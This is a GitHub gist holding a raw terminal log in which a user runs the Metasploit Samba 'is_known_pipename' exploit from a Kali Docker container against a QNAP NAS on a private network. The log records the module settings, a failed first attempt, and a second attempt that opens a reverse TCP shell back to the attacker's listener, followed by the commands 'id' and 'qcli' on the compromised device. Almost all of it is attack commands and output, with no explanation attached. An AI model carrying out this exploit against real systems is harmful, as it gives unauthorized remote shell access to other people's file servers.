Skip to content

Instantly share code, notes, and snippets.

@chihchun

chihchun/20170527003912-screenlog

Created May 26, 2017 16:42
Show Gist options
  • Save chihchun/506d851499b3571bf7f3f1b4134efed4 to your computer and use it in GitHub Desktop.
Save chihchun/506d851499b3571bf7f3f1b4134efed4 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
20170527003912-screenlog
命令稿啟動於 2017年05月27日 (週六) 00時39分12秒
$ : 1495816752:0;script.sh 34:0;docker run -t -i --rm -p 4444:4444 kali-metasploit:trunk ^C
$
$
$
$
$ docker run -t -i --rm -p 4444:4444 kali-metasploit:trunk
[*] Starting the Metasploit Framework console.../ [*] Starting the Metasploit Framework console...- [*] Starting the Metasploit Framework console...\ [*] starting the Metasploit Framework console...| [*] STarting the Metasploit Framework console.../ [*] StArting the Metasploit Framework console...- [*] StaRting the Metasploit Framework console...\ [*] StarTing the Metasploit Framework console...| [*] StartIng the Metasploit Framework console.../ [*] StartiNg the Metasploit Framework console...- [*] StartinG the Metasploit Framework console...\ [*] Starting the Metasploit Framework console...| [*] Starting The Metasploit Framework console.../ [*] Starting tHe Metasploit Framework console...- [*] Starting thE Metasploit Framework console...\ [*] Starting the Metasploit Framework console...| [*] Starting the metasploit Framework console.../ [*] Starting the MEtasploit Framework console...- [*] Starting the MeTasploit Framework console...\ [*] Starting the MetAsploit Framework console...| [*] Starting the MetaSploit Framework console.../ [*] Starting the MetasPloit Framework console...- [*] Starting the MetaspLoit Framework console...\ [*] Starting the MetasplOit Framework console...| [*] Starting the MetasploIt Framework console.../ [*] Starting the MetasploiT Framework console...- [*] Starting the Metasploit Framework console...\ [*] Starting the Metasploit framework console...| [*] Starting the Metasploit FRamework console.../ [*] Starting the Metasploit FrAmework console...- [*] Starting the Metasploit FraMework console...\ [*] Starting the Metasploit FramEwork console...| [*] Starting the Metasploit FrameWork console.../ [*] Starting the Metasploit FramewOrk console...- [*] Starting the Metasploit FramewoRk console...\ [*] Starting the Metasploit FrameworK console...| [*] Starting the Metasploit Framework console.../ [*] Starting the Metasploit Framework Console...- [*] Starting the Metasploit Framework cOnsole...\ [*] Starting the Metasploit Framework coNsole...| [*] Starting the Metasploit Framework conSole.../ [*] Starting the Metasploit Framework consOle...- [*] Starting the Metasploit Framework consoLe...\ [*] Starting the Metasploit Framework consolE...| [*] Starting the Metasploit Framework console.../ [*] Starting the Metasploit Framework console...- [*] Starting the Metasploit Framework console...\ [*] Starting the Metasploit Framework console...| [*] Starting the Metasploit Framework console.../ [*] Starting the Metasploit Framework console...- [*] Starting the Metasploit Framework console...\ [*] starting the Metasploit Framework console...| [*] STarting the Metasploit Framework console.../ [*] StArting the Metasploit Framework console...- [*] StaRting the Metasploit Framework console...\ [*] StarTing the Metasploit Framework console...|

.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .

=[ metasploit v4.14.22-dev-2835c165d7 ]
+ -- --=[ 1658 exploits - 947 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 10.11.12.227
RHOST => 10.11.12.227
msf exploit(is_known_pipename) > set LHOST 10.11.12.237
LHOST => 10.11.12.237
msf exploit(is_known_pipename) > set SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent
SMB_SHARE_BASE => /share/CACHEDEV1_DATA/torrent
msf exploit(is_known_pipename) > show optinos
[-] Invalid parameter "optinos", use "show -h" for more information
msf exploit(is_known_pipename) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.11.12.227 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
1 Linux x86_64
msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 172.17.0.2:4444
[*] 10.11.12.227:445 - Using location \\10.11.12.227\torrent\ for the path
[*] 10.11.12.227:445 - Hunting for payload using common path names: SgrCKKfK.so - //10.11.12.227/torrent/
[*] 10.11.12.227:445 - Trying location /share/CACHEDEV1_DATA/torrent/SgrCKKfK.so...
[*] Exploit completed, but no session was created.
msf exploit(is_known_pipename) > exploitshow options

Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.11.12.227 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.17.0.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux x86_64
msf exploit(is_known_pipename) > show optionsexploitshow optionsnoset SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent LHOST 10.11.12.237RHOST 10.11.12.227LHOST 10.11.12.237
LHOST => 10.11.12.237
msf exploit(is_known_pipename) > set LHOST 10.11.12.237how options

Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.11.12.227 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.11.12.237 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux x86_64
msf exploit(is_known_pipename) > show optionset LHOST 10.11.12.237how optionsexploit

[-] Handler failed to bind to 10.11.12.237:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 10.11.12.227:445 - Using location \\10.11.12.227\torrent\ for the path
[*] 10.11.12.227:445 - Hunting for payload using common path names: ouQlgeuC.so - //10.11.12.227/torrent/
[*] 10.11.12.227:445 - Trying location /share/CACHEDEV1_DATA/torrent/ouQlgeuC.so...
[*] Command shell session 1 opened (172.17.0.2:4444 -> 10.11.12.227:59752) at 2017-05-26 16:40:58 +0000
id
uid=65534(guest) gid=0(administrators) groups=65534(guest),760426308
qcli
/bin/sh: line 2: qcli: command not found
/sbin/qcli
Fail to lock log file!
: Permission denied
Fail to lock log file!
: Permission denied
-v --version, display the version of QCLI and exit.
-h --help, print this help.
-l --login, login to check authentication.
qcli_admin, admin operations.
qcli_volume, volume operations.
qcli_pool, pool operations.
qcli_raid, RAID operations.
qcli_hdd, HDD operations.
qcli_cache, cache operations.
qcli_iscsi, iSCSI operations.
qcli_iscsiacl, iSCSI ACL operations.
qcli_iscsibackup, iSCSI backup operations.
qcli_virtualdisk, virtual disk operations.
qcli_power, power operations.
qcli_network, network operations.
qcli_log, log operations.
qcli_backuprestore, backup/restore operations.
qcli_firmwareupdate, firmware update operations.
qcli_sharedfolder, shared folder operations.
qcli_quota, quota operations.
qcli_networkservice, network service operations.
qcli_encrypt, encrypt operations.
qcli_rsyncserver, rsync server operations.
qcli_rtrrserver, rtrr server operations.
qcli_timemachine, time machine operations.
qcli_nastonas, nas to nas operations.
qcli_rsync, rsync operations.
qcli_rtrr, rtrr operations.
qcli_networkrecyclebin, network recycle bin operations.
qcli_timezone, time zone operations.
qcli_domainsecurity, domain security operations.
qcli_wifi, wifi operations.
qcli_users, users operations.
qcli_usergroups, usergroups operations.
qcli_ntp, NTP service operations.
qcli_hardware, hardware operations.
qcli_systemstatus, system status operations.
qcli_externaldevice, external device operations.
qcli_mysqlserver, mysqlserver operations.
qcli_volumesnapshot, volume snapshot operations.
qcli_iscsisnapshot, iSCSI snapshot operations.
qcli_domaincontroller, domain controller operations.
qcli_snapreplica, SnapReplica operations.
qcli_snapshotvault, Snapshot Vault operations.
qcli_vjbod, Virtual JBOD operations.
QCLI 4.3.3 20170516, QNAP Systems, Inc.
exit
[*] 10.11.12.227 - Command shell session 1 closed. Reason: Died from EOFError
msf exploit(is_known_pipename) > exit
$ exit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment